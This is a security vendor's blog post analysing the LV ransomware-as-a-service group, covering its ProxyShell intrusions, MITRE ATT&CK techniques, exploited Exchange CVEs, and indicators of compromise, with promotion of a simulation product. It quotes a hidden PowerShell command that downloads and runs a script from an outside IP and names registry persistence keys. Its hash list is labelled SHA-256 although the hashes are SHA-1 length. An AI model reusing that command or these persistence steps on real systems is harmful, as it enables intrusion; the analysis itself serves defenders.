LV Ransomware Analysis and Simulation

Keep up to date with latest blog posts

Ransomware-as-a-Service (RaaS) is one of the top ransomware trends observed in recent years. Some ransomware groups, such as Conti, LockBit, and BlackCat rent or sell their malicious payloads to other threat groups. Following this popular trend, the LV ransomware group operates as a RaaS provider and targets organizations in the US, Canada, Saudi Arabia, and many European countries. In their latest ransomware attack, the LV ransomware group hit a Jordan-based company [1].

Picus Threat Library includes attack simulations for different LV ransomware variants, and Picus Labs advises organizations to assess their security posture against adversary techniques used by the LV ransomware group. In this blog, we explained how the LV ransomware group operates and which adversary techniques they use.

Simulate Ransomware Threats with 14-Day Free Trial of Picus Platform

LV Ransomware Group

LV group is a Ransomware-as-a-Service group that has been active since late 2020. Their ransomware payloads are reportedly based on another infamous ransomware group called REvil (aka Sodinokibi). However, the nature of the relationship between LV and REvil is not clear. The research suggests that the LV group either bought or stole the source code from the REvil group and then modified it for their ransomware operations [2].

In addition to RaaS operations, the LV ransomware group also uses initial access brokers (IABs) and buys their way into organizations. LV ransomware group mainly targets manufacturing, retail, and technology organizations in Europe, North America, and Asia. For example, they attacked Germany-based multinational semiconductor manufacturer SEMIKRON in August 2022, and threat actors claimed to steal 2TB worth of documents [3].

How Does the LV Ransomware Group Operate?

As an initial access technique, the LV ransomware group drops a web shell into public access folders by abusing ProxyShell vulnerabilities in Microsoft Exchange servers. After gaining initial access, threat actors establish persistence by modifying registry keys that execute a malicious PowerShell script whenever a user logs on. The PowerShell script installs a backdoor in the victim's environment.

Figure 1: LV ransomware persistence mechanism [1]

Afterward, the group uses netscan and Advanced Port Scanner for network discovery and Mimikatz for credential dumping. Logs collected from compromised servers indicate that threat actors were able to log in via compromised user accounts multiple times. The LV ransomware group used the domain administrator account to move laterally via RDP and infect other assets in the victim's network.

In the final step, attackers create a custom group policy object and set a scheduled task that runs the batch files named ‘install.bat' and ‘1.bat' to deploy the ransomware to all computers that were connected to the domain controller. 

Figure 2: The XML file to schedule tasks in the DC group policies folder [1]

Once the sensitive files are encrypted, threat actors delete their malicious artifacts and drop a ransom note on machines.


Figure 3: A ransom note sample by LV Ransomware [4]

TTPs Used by LV Ransomware Group

LV ransomware group uses the following tactics, techniques, and procedures (TTPs) in the MITRE ATT&CK framework:

Tactic: Initial Access

  • T1190 Exploit Public-Facing Application

LV group exploits ProxyShell and ProxyLogon vulnerabilities in MS Exchange servers to gain initial access.

Vulnerability

CVE Number

CVSS Score

Microsoft Exchange Server Remote Code Execution Vulnerability

CVE-2021-34473

9.8 Critical

Microsoft Exchange Server Elevation of Privilege Vulnerability

CVE-2021-34523 

9.8 Critical

Microsoft Exchange Server Security Feature Bypass Vulnerability

CVE-2021-31207

7.2 High

Microsoft Exchange Server Remote Code Execution Vulnerability

CVE-2021-26855

9.8 Critical

Microsoft Exchange Server Remote Code Execution Vulnerability

CVE-2021-27065

7.8 High

Tactic: Execution

  • T1059.001 Command and Scripting Interpreter: Powershell

LV group uses PowerShell for several purposes, such as downloading other malicious files.

powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File "IEX ((new-object net.webclient).downloadstring('http://185.82.219.201/sss'))"

  • T1059.003 Command and Scripting Interpreter:Windows Command Shell

LV group executes .bat files for purposes such as deploying ransomware on target machines and disabling their security mechanisms.


Figure 4: Contents of ‘install.bat' file to disable security services [1] 


Figure 5: Contents of ‘1.bat' file [1]

Tactic: Persistence

  • T1078.002 Valid Accounts: Domain Accounts

LV group establishes persistence by using compromised user accounts in the Active Directory.

  • T1505.003 Server Software Component: Web Shell

LV group deploys a web shell to compromised computers as a gateway into the victim's network.

  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

LV group modifies the registry keys below to execute a malicious PowerShell script whenever a user logs in.

HKU\.Default\Software\Microsoft\Windows\CurrentVersion\Run

HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run

Tactic: Privilege Escalation

  • T1078.002 Valid Accounts: Domain Accounts

LV group gains domain admin privileges via the compromised credentials for the domain administrator account.

Tactic: Defense Evasion

  • T1036.004 Masquerading: Masquerade Task or Service

LV ransomware names its malicious scheduled task as 'GoogleUpdateUX' to make them appear legitimate.

  • T1027.002 Obfuscated Files or Information: Software Packing

LV group stores the ransomware binary in RC-4 encrypted format within a section with the name 'enc' in order to avoid signature-based detection

  • T1484.001 Domain Policy Modification: Group Policy Modification

LV group creates a malicious Group Policy Object that schedules the tasks for deploying their malware to bypass execution policies.

  • T1562.001 Impair Defenses: Disable or Modify Tools

LV group executes the 'install.bat' file on target computers in order to disable security services.

  • T1070.004 Indicator Removal: File Deletion

LV group deleted their artifacts from the victim's network after encrypting files to minimize their footprint and avoid forensic analysis.

Tactic: Credential Access

  • T1003.001 OS Credential Dumping

LV group uses Mimikatz to dump account credentials.

Tactic: Discovery

  • T1083 Network Service Discovery

LV group uses tools such as Netscan and Advanced Port Scanner to discover services in the network.

Tactic: Lateral Movement

  • T1021.001 Remote Services: Remote Desktop Protocol

LV group moves laterally to other hosts in the victim's network via RDP and the compromised domain admin credentials.

Tactic: Command and Control

  • T1105 Ingress Tool Transfer

LV group downloads third-party tools they need to the compromised network via built-in utilities such as IEX().downloadString().

Tactic: Impact

  • T1486 Data Encrypted for Impact

LV ransomware encrypts victims' files and appends them with extensions such as 'l7dm4566n'

How Picus Helps Simulate LV Ransomware Attacks?

We also strongly suggest simulating LV ransomware attacks to test the effectiveness of your security controls against ransomware attacks using the Picus Complete Security Validation Platform. You can test your defenses against LV ransomware and hundreds of other ransomware such as REvil, BlackCat, and LockBit within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for LV ransomware

Threat ID

Action Name

Attack Module

68128

LV Ransomware Email Threat

Email Infiltration (Phishing)

91612

LV Ransomware Download Threat

Network Infiltration

Indicators of Compromises

SHA-256

fc0d749c75ccd5bd8811b98dd055f9fa287286f7

3ffc87d9b429b64c09fcc26f1561993c3fb698f4

b7d57bfbe8aa31bf4cacb960a390e5a519ce2eed

B8FF09ABEAD5BAF707B40C84CAF58A3A46F1E05A

1b67e4672b2734eb1f00967a0d6dd8b8acc9091e

3e4a30a16b1521f8a7d1855b4181f19f8d00b83b

2e02a6858b4e8dd8b4bb1691b87bc7d5545297bc

9cb059d2c74266b8a42017df8544ea76daae1e87

49c35b2916f664e690a5c3ef838681c8978311ca

f25c9b5f42b19898b2e3df9723bce95cf412a8ff

97822c165acd1c0fd4ff79bbad146f93f367e18c

9e0026572e3c839356d053cb71b8cbbbacb2627b

027889533afe809b68c0955a7fc3cb8f3ae33c08

   

References

[1] "LV Ransomware Exploits ProxyShell in Attack on a Jordan-based Company," Trend Micro, Oct. 25, 2022. [Online]. Available: https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html. [Accessed: Oct. 27, 2022]

[2] "GOLD NORTHFIELD." [Online]. Available: http://www.secureworks.com/research/threat-profiles/gold-northfield. [Accessed: Oct. 27, 2022]

[3] S. Gatlan, "Semiconductor manufacturer Semikron hit by LV ransomware attack," BleepingComputer, Aug. 02, 2022. [Online]. Available: https://www.bleepingcomputer.com/news/security/semiconductor-manufacturer-semikron-hit-by-lv-ransomware-attack/. [Accessed: Oct. 27, 2022]

[4] "LV Ransomware," Jun. 22, 2021. [Online]. Available: https://www.secureworks.com/research/lv-ransomware. [Accessed: Oct. 27, 2022]

Subscribe

Keep up to date with latest blog posts